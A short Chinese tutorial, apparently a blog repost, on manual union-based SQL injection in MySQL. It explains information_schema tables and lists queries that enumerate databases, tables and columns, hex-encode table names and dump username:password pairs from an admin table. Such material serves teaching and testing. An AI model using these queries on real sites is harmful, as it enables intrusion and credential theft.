mysql中的information_schema 結構用來存儲數據庫系統信息
information_schema 結構中這幾個表存儲的信息,在注射中可以用到的幾個表。
| SCHEMATA ――>存儲數據庫名的,
|——>關鍵字段:SCHEMA_NAME,表示數據庫名稱
| TABLES ――>存儲表名的
|——>關鍵字段:TABLE_SCHEMA表示表所屬的數據庫名稱;
TABLE_NAME表示表的名稱
| COLUMNS ――>存儲字段名的
|——>關鍵字段:TABLE_SCHEMA表示表所屬的數據庫名稱;
TABLE_NAME表示所屬的表的名稱
COLUMN_NAME表示字段名
可以看到,我們只要通過注射點構造查詢語句遍相關字段,就可以得到我們想要的信息了。
爆所有數據名
select group_concat(SCHEMA_NAME) from information_schema.schemata
得到當前庫的所有表
select group_concat(table_name) from information_schema.tables where table_schema=database()
得到表中的字段名 將敏感的表進行16進制編碼adminuser=0x61646D696E75736572
select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572
得到字段具體的值
select group_concat(username,0x3a,password) from adminuser
union select 手工注入
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。